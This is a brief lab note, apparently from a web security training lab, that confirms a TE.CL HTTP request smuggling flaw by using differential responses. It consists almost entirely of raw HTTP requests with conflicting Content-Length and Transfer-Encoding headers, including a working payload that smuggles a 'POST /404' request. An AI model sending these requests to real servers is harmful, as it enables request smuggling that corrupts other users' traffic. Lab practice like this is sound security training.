Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

Back-end: Content-Length: Length
Front-end: Transfer-Encoding: chunked

Analysis:
(1)
POST / HTTP/1.1
Host: 0a7e00ff040063c080f89eb8004a008d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Transfer-Encoding: chunked

3
abc
x

-----------> invalid (TE.CL)

(2)
POST / HTTP/1.1
Host: 0a7e00ff040063c080f89eb8004a008d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Transfer-Encoding: chunked

0

x
-----> timeout (TE.Cl)

(2)
POST / HTTP/1.1
Host: 0a7e00ff040063c080f89eb8004a008d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

-----------